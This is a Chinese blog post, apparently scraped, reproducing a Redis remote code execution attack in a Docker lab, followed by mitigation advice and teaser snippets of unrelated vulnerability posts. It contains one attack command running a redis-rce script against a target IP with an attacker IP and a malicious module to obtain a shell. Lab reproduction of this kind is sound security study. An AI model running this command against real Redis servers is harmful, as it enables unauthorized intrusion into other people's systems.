Redis RCE漏洞復現

2021-09-29 18:24:15 字數 935 閱讀 2545

一、簡介

redis:remote dictionary server(redis) 是乙個由salvatore sanfilippo寫的key-value儲存系統。redis是乙個開源的使用ansi c語言編寫、遵守bsd協議、支援網路、可基於記憶體亦可持久化的日誌型、key-value資料庫,並提供多種語言的api。

二、漏洞復現過程

1、使用工具

2、環境配置

(1)安裝redis 環境

ps:由於是在win7上搭建的docker環境,一開始pull失敗,多試了幾次就好了,很神奇。

(2)啟動redis

(3)訪問搭建好redis環境的docker主機

出現這個頁面表示一切正常,放心進行下一步。

(4)開始攻擊

python redis-rce.py –r 目標ip –l 攻擊者ip –f module.so

在本地執行redis-rce.py,成功getshell。

三、漏洞建議

1、禁止外部訪問redis服務埠。

2、禁止root許可權啟動redis服務。

3、限制訪問redis服務的ip。

漏洞復現 CVE 2020 1938漏洞復現

tomcat connector 是 tomcat 與外界連線的通道,使得它與 catalina 能夠接收外部的請求,傳遞給對應的 web 應用程式處理,並返回對應的請求結果。http connector就是用來提供經常用到的http web服務,而ajp connector使用的ajp協議 apa...

漏洞復現 Winrar目錄穿越漏洞復現

該漏洞是由於 winrar 所使用的乙個陳舊的動態鏈結庫unacev2.dll所造成的,該動態鏈結庫在 2006 年被編譯,沒有任何的基礎保護機制 aslr,dep 等 動態鏈結庫的作用是處理 ace 格式檔案。而winrar解壓ace檔案時,由於沒有對檔名進行充分過濾,導致其可實現目錄穿越,將惡意...

Ubuntu漏洞復現

官方緊急修復 ubuntu最新爆出的漏洞 無需系統密碼,就能新增新的sudo使用者 獲取root許可權,事後還能刪除不留痕跡。github安全研究員kevin backhouse發現的乙個ubuntu系統大漏洞。這種攻擊方法非常簡單,backhouse在官方部落格中寫道 使用終端中的一些簡單命令,並...